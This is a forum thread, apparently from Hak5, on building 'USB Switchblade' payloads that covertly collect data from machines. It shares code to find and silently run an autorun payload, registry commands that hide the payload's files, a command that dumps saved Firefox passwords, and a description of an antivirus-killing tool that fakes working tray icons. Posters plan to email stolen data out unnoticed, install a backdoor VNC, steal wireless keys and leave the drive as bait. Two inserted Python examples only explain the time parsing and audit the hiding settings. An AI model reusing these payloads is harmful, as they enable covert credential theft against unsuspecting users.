USB Switchblade Development


Darren Kitchen


pseudobreed,

I follow your payload so far except this threw me for a loop.

:: Schedule Update

:: Parse Time
for /f "tokens=5-8 delims=:. " %%a in ('echo/^|time') do (
  set hh=%%a
  set mn=%%b
  set ss=%%c
  set ds=%%d
)

:: Add 5 Minutes
set /a mn=mn+5

:: If Min is less than 10, add 0 to front
if %mn% LSS 10 set mn=0%mn%

:: Sched Next Update
at %hh%:%mn% %windir%\system32\sched.bat

:: Done

Can you explain this part of your batch in more detail? I'm currently working on a hack for the next episode that I'm almost done with, except for a little issue with retrieving "goodies" that the program gathers. It needs to run at a set interval and upload said goodies to a remote location without the user noticing. I'd rather not use the Windows task scheduler, and any way to suppress a command window would be best. If you could clear that up for me or offer any suggestions on my problem that would be a great help. The hack I'm working on has some really big potential if I can just get the data off the owned machine automatically and without notice.


Sorry for double post. Just downloaded pseudobreed's payload to analyze. Came in at 8 KB/s. Here are hak5.org mirrors

http://www.hak5.org/releases/2x02/switchbl...uzer_Loader.zip

PS: This is a really elegant payload. It should be added to the wiki.

Edit: Scratch that, I can't seem to download the Payload zip. The download quits after a minute and I only get 10%. Could you mirror somewhere?


Bah, free hosts are not what they used to be...

Here are links with YouSendIt (File should be available for 7 days)

Cruzer Loader

Cruzer Payload

USB Payload

Let's see if I can explain this.

The for statement in batch is pretty much like this:

for /F ["option"] {%% | %}variable in {'command'} do ()

/F

Tells the for statement to parse a file or command

["option"]

The tokens option says which tokens from each line are to be passed for each loop. So, I'm saying grab tokens 5 through 8. If the last character is an * then it keeps making variables until the remaining text on the line is parsed. (i.e. tokens=1-* would grab the whole line)

The delims state what to ignore.

{%% | %}variable

This is the replaceable variable(s). %% is to be used in batch files. % is to use at the command prompt. They are case-sensitive and you have to give it an alpha value, such as %a, %b, or %c. I started out with a, so it will create variables a, b, c, d, etc...

{'command'}

This is the command or file to parse.

Here is the FOR command in MSDN.

set

Creates a local variable until the batch ends.

/a

Tells the set command that we are using a math expression.

So, I took the mn variable (Minutes) and added 5 to it.

Then I checked to see if it was greater than 10. If it's less than 10, set only creates a single digit number. So, to fix this I just throw a 0 in front so the "at" command will accept the variable as double digit minutes.

I hope that explains everything.

The only reason I used the sched is I didn't want to write an application that had a timer in it. I figured an application running all the time in the background is more noticeable than a task in the scheduler. Not many people actually look at their scheduler. The only fallback there is the task scheduler service has to be running, I found that out earlier. I'm going to include that fix along with the NAT-NAT connection in the next version.

I'm almost tempted to try and figure out what Hamachi does and set up a silent install that way. It would be really nice to just have a messenger-like app with all the computers listed and connected through a VPN. I do know on the install, it creates a network driver, then they do a NAT to NAT using their private servers...
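To make the tokens/delims rules concrete, here is an added example that is not part of pseudobreed's post or payload: a small Python emulation of how `for /F` picks tokens 5 through 8 out of a constructed copy of what `echo/|time` prints, followed by the same minute arithmetic. The function names (`for_f`, `next_update_time`, `schedule_from_time_output`) and the sample text are the example's own; the arithmetic also carries minutes past 59 into the next hour, which the batch above does not, since 14:63 is not a time `at` can take.

```python
import re

# Constructed sample of what `echo/|time` prints on an English Windows XP
# system: the current-time line, then the prompt `time` shows before it reads
# the empty line that echo/ piped into it.
SAMPLE_TIME_OUTPUT = "The current time is: 14:57:45.67\nEnter the new time: \n"


def _parse_tokens_spec(spec):
    """Turn a tokens= string ("5-8", "1,3", "1-*", "2*") into the list of
    1-based token numbers it names and whether a trailing * asks for the
    remainder of the line."""
    wants_rest = spec.endswith("*")
    body = spec.rstrip("*").rstrip(",")
    numbers = []
    for part in body.split(","):
        if not part:
            continue
        if "-" in part:
            lo, hi = part.split("-", 1)
            if hi == "":            # "1-*": the range runs into the *
                numbers.append(int(lo))
            else:
                numbers.extend(range(int(lo), int(hi) + 1))
        else:
            numbers.append(int(part))
    return numbers, wants_rest


def for_f(text, tokens="1", delims=" \t", eol=";"):
    """Emulate the line and token rules of cmd's `for /F "tokens=.. delims=.."`:
    blank lines and lines beginning with the eol character are skipped, a run
    of delimiter characters counts as one separator, a line that lacks the
    first requested token is skipped, missing later tokens come back as "",
    and a trailing * in tokens= yields the untouched remainder of the line.
    Returns one list of variable values per line for which the `do` body
    would run."""
    numbers, wants_rest = _parse_tokens_spec(tokens)
    token_re = re.compile("[^" + re.escape(delims) + "]+")
    rows = []
    for line in text.splitlines():
        if not line or line.startswith(eol):
            continue
        found = list(token_re.finditer(line))
        if numbers and numbers[0] > len(found):
            continue                         # first variable would be empty
        row = [found[n - 1].group(0) if n <= len(found) else "" for n in numbers]
        if wants_rest:
            last = max(numbers) if numbers else 0
            if last == 0:
                rest = line
            elif last <= len(found):
                rest = line[found[last - 1].end():]
            else:
                rest = ""
            row.append(rest.lstrip(delims))
        rows.append(row)
    return rows


def next_update_time(hh, mn, minutes_ahead=5):
    """The HH:MM string the batch hands to `at`: the minute is zero-padded as
    the `if %mn% LSS 10 set mn=0%mn%` step does, and, unlike the batch,
    minutes past 59 are carried into the hour and the clock wraps at
    midnight, so the result is always a time `at` can accept."""
    total = (int(hh) * 60 + int(mn) + minutes_ahead) % (24 * 60)
    return "%02d:%02d" % divmod(total, 60)


def schedule_from_time_output(output=SAMPLE_TIME_OUTPUT, minutes_ahead=5):
    """Run the same parse as the batch (tokens 5-8, delims ":. ") over the
    `time` output and return (hh, mn, ss, ds, next_run)."""
    rows = for_f(output, tokens="5-8", delims=":. ")
    hh, mn, ss, ds = rows[0]
    return hh, mn, ss, ds, next_update_time(hh, mn, minutes_ahead)


if __name__ == "__main__":
    print(for_f(SAMPLE_TIME_OUTPUT, tokens="5-8", delims=":. "))
    print(schedule_from_time_output())
```

Running it shows that the second line of the `time` output ("Enter the new time:") never reaches the loop body because it has no fifth token, which is why the four variables end up holding only the time fields of the first line.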


Set objFSO = CreateObject("Scripting.FileSystemObject")
Set colDrives = objFSO.Drives
For Each objDrive in colDrives
  If objFSO.FileExists(objDrive.DriveLetter & ":\wipcmd\go.cmd") Then
    strPath = objDrive.DriveLetter & ":\wipcmd"
    strcmd = """" & strPath & "\" & "go.cmd" & """"
    CreateObject("Wscript.Shell").CurrentDirectory = strPath
    CreateObject("Wscript.Shell").Run strcmd, 0, False
  End If
Next

Hi pseudobreed, I see one issue with your code. I've been working on various USB attacks over the past few months, originally being interested in hacking iPod firmware to get it to autorun, and had decided to try with U3 devices after I read up on them. The wonderful folks on this forum beat me to it by a couple of weeks though ;( Anyhow - your code will search through each drive on the system looking for the presence of the file "wipcmd\go.cmd" in order to find the drive that the USB partition is on. This is what I had originally planned to do as well, unfortunately it is not as stealthy as I had hoped. If the user has a CD-ROM or floppy in the machine your code will make a call to the disk to look for the presence of the file. In both these cases a user would realise something was going on as the floppy will start making noise / CD-ROM will start spinning.

There are 2 ways I tried to get around this. Firstly you can check the values in the HKLM\System\MountedDevices key that are in the format "\DosDevices\[DRIVE LETTER]" and look for the value that corresponds to the USB drive.

The other way (that I use) is a simple loop written in C++ that starts at D: and works through to Z: (then does A: - C: ) calling GetVolumeInformation on each drive until you find the one whose serial number matches your disk. Or easier again rename your disk to something like " Local Disk" (note the space) and search the GetVolumeInformation for that. This is great as it does not actually query the disks themselves - just the registry. Then once you have your drive just take the drive letter and ShellExecute your autorun file on the autorun partition.

I'll post up my payload and stuff later on - it's similar to what people have already posted with some small differences. The idea I wanted with my payload was that I wanted there to be no traces of the machine ever being touched - so there are no backdoors dropped, firewall settings changed etc.


The above code was from MD's vbscript, however, I used the same method to look for the drive.

I liked your idea so I redid my code and commented it.

I added the GetDriveType API to query the drive to find out what kind of drive it is. This does not spin up the CD-Rom drives. If the type is removable, then look for the file and execute it.

Option Explicit

' API Function to get type of Drive
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long

Private Sub Form_Load()
  Dim FSO As New FileSystemObject   ' File System Object
  Dim objDrive As Drive             ' Drive Object
  Dim lCurrDrive As Long            ' Current Drive Letter/Number
  Dim lDriveType As Long            ' Current Drive Type

  ' Begin loop to check each drive for removable drive
  For Each objDrive In FSO.Drives
    ' Convert current drive letter to ANSI
    lCurrDrive = Asc(objDrive.DriveLetter)

    ' Get drive type with API call (root path needs the trailing backslash)
    lDriveType = GetDriveType(Chr$(lCurrDrive) & ":\")
      ' 0: Unknown
      ' 1: Does Not Exist
      ' 2: Removable Drive
      ' 3: Fixed Drive
      ' 4: Remote Drive
      ' 5: CD-ROM Drive
      ' 6: RAM Drive

    ' If drive is removable, then look for the file
    If lDriveType = 2 Then
      If FSO.FileExists(objDrive.DriveLetter & ":\autorun.bat") Then
        ' Change directory path for shell call
        ChDrive objDrive.DriveLetter & ":"

        ' Exec autorun.bat
        Shell objDrive.DriveLetter & ":\autorun.bat"

        ' Clean up
        Set objDrive = Nothing
        Set FSO = Nothing
      End If
    End If
  Next

  ' Exit
  Unload Me
End Sub

And, the new file can be downloaded here.


I was just thinking, for the non-U3 way, is there any way that you could turn the option of "Hidden files and folders" to Do Not Show?

Because the payload is run right when they click to look at what's on the stick, could some command turn Hidden files and folders to do not show, so that the folder doing everything to the computer would not show up?


I thought about that, and it can be done in the registry.

Do not show System Files

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000

Do not show Hidden Files

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000002

Or add this code to autoexec.bat in my payload:

:: Hide Hidden and System Files
RECYCLER\nircmd.exe regsetval dword "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" "ShowSuperHidden" "0"
RECYCLER\nircmd.exe regsetval dword "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" "Hidden" "2"
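Seen from the other side, these two values are exactly what an administrator would audit to notice that Explorer's view settings have been flipped on a machine. The Python below is an added example, not code from this thread or from nircmd: it parses a constructed regedit export of the Explorer\Advanced key (only the subset of .reg syntax shown above) and lists every value that differs from what a user who wants hidden and system files visible would have, namely Hidden=1 and ShowSuperHidden=1. The function names, the sample export and the two filler values in it are the example's own.

```python
import re

# Constructed regedit export of the Explorer\Advanced key, written the way
# regedit saves it, as it would look after the two nircmd calls above have
# run. The last two values are filler so the parser has data it must leave
# alone.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000002
"ShowSuperHidden"=dword:00000000
"HideFileExt"=dword:00000000
"Start_ShowRun"=dword:00000001
"""

ADVANCED_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"

# Settings of someone who wants to see everything on a removable drive:
# Hidden=1 shows hidden files, ShowSuperHidden=1 shows protected OS files.
# A missing value means Explorer's default, which hides them, so it is
# reported as well.
EXPECTED = {"Hidden": 1, "ShowSuperHidden": 1}

# "name"=dword:xxxxxxxx  or  "name"="string"
_VALUE_RE = re.compile(r'^"([^"]+)"=(?:dword:([0-9A-Fa-f]{8})|"(.*)")$')


def parse_reg_export(text):
    """Parse the subset of .reg syntax used above: [key] header lines followed
    by "name"=dword:... or "name"="..." lines. Returns {key: {name: value}}
    with dword values converted to int and strings kept as str."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m is None or current is None:
            continue                      # comments or unsupported value types
        name, dword, string = m.groups()
        keys[current][name] = int(dword, 16) if dword is not None else string
    return keys


def explorer_hiding_findings(keys):
    """List (value name, current value, expected value) for every Explorer
    view setting that would keep hidden or system files out of sight."""
    values = keys.get(ADVANCED_KEY, {})
    return [(name, values.get(name), want)
            for name, want in EXPECTED.items()
            if values.get(name) != want]


if __name__ == "__main__":
    for name, have, want in explorer_hiding_findings(parse_reg_export(SAMPLE_REG_EXPORT)):
        print("%s is %r, expected %r" % (name, have, want))
```

On the sample export both values are reported; the same check run over a `reg export` of the key from a real machine (or over the live key through the `winreg` module) tells you whether a user's Explorer view was changed underneath them.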


Yep Poyboy, I get that too on this machine, along with a Mozy Remote window opening up.

How about WEP Keys, or any wireless details? I'm using Amish's version on laptops and it would be great to steal WEP/WPA details for use with my own laptop or nintendo DS linux.


I remember there being a proof of concept of where you could RPC the Wireless Zero Configuration Service and it would drop WEP and WPA in clear text. And, you could do it without being under an admin account.

However, it only worked after the View Available Wireless Networks was opened.

In June, Microsoft issued a patch that actually changes the time it holds this info in the cache.

I didn't hear much about it after that, or even know if the exploit still works.


As no one has brought this up before, in my situation I use my Switchblade a lot on the same computers, transferring files from one to the other. Just to add a little stealthiness I added this line to my go.cmd

if exist Documents\logfiles\%computername%.log goto end

This will essentially stop making copies of computers you already have info on. This isn't a necessity but on some older computers I noticed a small lag time while the payload is run. What do you guys think?


Instead of just ending the batch, why not call a goto that will exec applications that have dumps that could have changed (i.e. Internet History/Passwords, Email Client, Messengers, Keylogs).

I do see what you are saying, no reason to pull off a full payload if you already have most of the info.

I added an update to the payload that downloads a new payload and dumps info that may have changed and emails it out using blat. I personally didn't want to chance plugging the drive in again, especially if it was physically difficult to get to the computer the first time.

If only I could get a good NAT-NAT connection going, then the backdoor VNC will come in handy much more when needing to remotely update the payload. At the moment, I'm limited to computers that are on the same network. Like the user who walks away from his computer to get a refill at the local "hot-spot."

I'm dropping Hamachi as an option. I started to write an app that grabbed the hwnd of applications so I could delete the system tray icons, however, hamachi adds much more than just an icon, and I'm not sure if you can hide network adapters or not.

I'm going to check out OpenVPN now...

Once I get that going, I'm thinking about "losing" the key in a parking lot and having blat just email once the payload is pulled off. Would be kind of interesting to see where it travels. Unless someone puts it in a machine that has no internet connection, then formats the drive to keep as their own.


Project on hold, my hat's getting sun-bleached...

URL Removed.

AVKill 1.0 by Moonlit
=====================

Description:
============
This tool will kill a selection of antivirus applications.
The antivirus application will be killed only until the next reboot, no files are modified or destroyed.

Usage:
=====
Run Esc.exe either manually or via a batch or script. The AV killer (AVKill.exe) will be run under System privileges and kill the AV software.

Todo:
=====
Add tray icons to simulate the appearance of the AV being fully functional.
One example would be where AVG might grey out its tray icon to show something is not working, need to make it show a coloured icon to avoid suspicion.

Add more antivirus apps to be killed.

Possibly add firewalls and anti-spyware apps to help avoid detection even further.

Add options/switches to kill totally (remove AV), use tray icon(s), restart AV when done or after a certain time period.

Merge to 1 exe.

History/Fixes:
==============
V1.0: Fixed 100% CPU usage, removed test forms, fixed 'root dir only' bug.
v0.5: Added AVG, Avast, NOD32 and Trend.

Greetz:
=======
Melodic, Bigbro and Kainchick for testing, #hak5 on irc.hak5.org for help & support.

Duped in Switchblade thread for relevance, here for those who don't read aforementioned thread.

Edit: Updated versions available, see wiki page for info - will be updating wiki page more regularly than here most likely so keep an eye out :)


The AVKiller almost needs a thread by itself.

I tried it on one of my laptops running AntiVir and it did not kill it.

I'm not sure how discreet you are trying to make it; however, these are the things that popped up on me.

I use task scheduler/at all the time so when I noticed the new task scheduled it caught my eye. This only happens when you use it without the switch and I'm sure that is to gain system rights. A couple issues there, the task scheduler service has to be running and you have to have rights to the AT command.

Also, when I run 'avkill -a' from the command line about 4-5 console windows pop up on my start menu.

This laptop is running XP SP2 and AntiVir.

Here is some info on AntiVir that may help

Installed Directory:
C:\Program Files\AntiVir PersonalEdition Classic

Main Process:
C:\Program Files\AntiVir PersonalEdition Classic\avcenter.exe

Modules:
C:\Program Files\AntiVir PersonalEdition Classic\ccmainrc.dll
C:\Program Files\AntiVir PersonalEdition Classic\ccgrdrc.dll

Application Specific:
build.dat - Build Number
avewin32.dll - Search Engine
antivir.vdf - Virus Definitions
avcenter.exe - Control Center
avconfig.exe - Config Center
avscan.exe - Luke Filewalker
avpack32.dll - Archive Library
avguard.exe - AntiVir Guard
avgnflt.sys - Filter
sched.exe - Scheduler
update.exe - Updater

Services:
AntiVirService - AntiVir PersonalEdition Classic Guard
AntiVirScheduler - AntiVir PersonalEdition Classic Scheduler

If there is anything else I can provide that will help let me know.


Thanks man, that'll help a lot... support for AntiVir isn't enabled yet but thanks for the info... I knew about the AT command being obvious if you watch Task Scheduler but bear in mind in the switchblade environment you probably wouldn't have time to check it while someone's playing with a USB key ;)

Using the -a switch from the command line isn't supported as yet since running without switches enables the -a switch to work its magic (-a is the switch that makes it do the cool stuff)...

The console windows are from NET STOP commands used for some of the services used by the AVs and I've not seen them cause a problem with anyone's testing yet but I'll look in to it :)

I'll go about adding AntiVir support very soon, thanks again :D

Oh, and as for the thread: http://www.hak5.org/forums/viewtopic.php?t=2713 ;)


hmmm... what moonlit has done is great, but I still feel that encrypting the exes would be an easier way to go about things...

Pseudobreed's version seems to work well (although NOD32 absolutely HATES mailpv.exe), though it does a bit too much for what I want, and as such I've been playing around and editing it a bit...

I'm also extremely curious as to whether anyone has found a program similar to the "IE PassView" that is included with many of these switchblades, but that will get the passwords out of Firefox as well...


Just to add my little piece to this project, I came across this little gem called firepassword that will get the username/password of everything Firefox is told to remember. The only limitation is that the program cannot bypass master passwords. Installation is simple: just copy the 3 files to WIPCMD and add this line to your go.cmd.

FirePassword.exe >Documents\logfiles\%computername%.txt

I edited my go.cmd so a new folder was created just for this txt file. If anyone needs this more explained I can post the changes I made.

Here's the link for that program

http://nagmatrix.50webs.com/article_firepassword.html

sircrumpet-

found that back on page 17... hope that's what you were looking for.

-Sloth


I love that program, works great!

If you come across a master password for Firefox try firemaster from the same site. All you need is a decent dictionary file, which I'm having a hard time finding a good one of, any links someone could mention?

If anyone has the same thing for Opera that is what I'm after next.


Get the file named theargonlistver2.zip at http://www.theargon.com/achilles/wordlists/theargonlists/ It's 83 MB compressed, but after you extract it, it's around 2 GB :lol:

